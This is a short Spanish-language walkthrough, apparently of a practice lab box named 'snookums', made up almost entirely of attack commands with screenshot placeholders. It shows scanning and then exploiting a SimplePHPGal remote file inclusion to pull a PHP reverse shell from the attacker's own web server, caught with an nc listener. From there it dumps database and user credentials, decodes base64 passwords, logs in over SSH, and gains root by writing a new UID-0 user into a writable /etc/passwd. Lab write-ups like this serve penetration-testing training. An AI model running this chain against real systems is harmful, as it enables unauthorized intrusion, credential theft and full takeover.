nmap -A -p- -oA snookums 192.168.77.58 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA snookums 192.168.77.58

nmap -sU -O -p- -oA snookums-udp 192.168.77.58

nikto -h 192.168.77.58:80

Pasted image 20211102105218.png

Pasted image 20211102104301.png

Pasted image 20211102104534.png

whatweb http://192.168.77.58

Pasted image 20211102104641.png

Vemos una galeria en http://192.168.77.58

Pasted image 20211102104715.png

searchsploit SimplePHPGal

searchsploit -m 48424

Pasted image 20211102105530.png

Vamos a http://192.168.77.58/image.php?

Pasted image 20211102105544.png

python3 -m http.server 80

http://192.168.77.58/image.php?img=http://192.168.49.77/php-reverse-shell.php

nc -lvnp 21

Pasted image 20211102110128.png

cd /var/www/html && cat db.php

Pasted image 20211102110419.png

cat /var/www/html/db.php

mysql -u root -p

credenciales: root:MalapropDoffUtilize1337

use SimplePHPGal

select * from users

Pasted image 20211102113205.png

echo -n "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" |base64 -d

Adquirimos un texto y decodificamos de nuevo en base64

Credenciales: michael:HockSydneyCertify123

Pasted image 20211102113342.png

ssh michael@192.168.77.58

Pasted image 20211102113548.png

Vemos que se puede sobreescribir en etc/passwd

Pasted image 20211102113652.png

openssl passwd -1 hack 123123

echo 'hack:$1$hack$R78Vb02JSSxv5kQZvNiPU.:0:0:root:/bin/bash'

su hack

Pasted image 20211102115804.png

boxes

copyright©2022 Cu3rv0x all rights reserved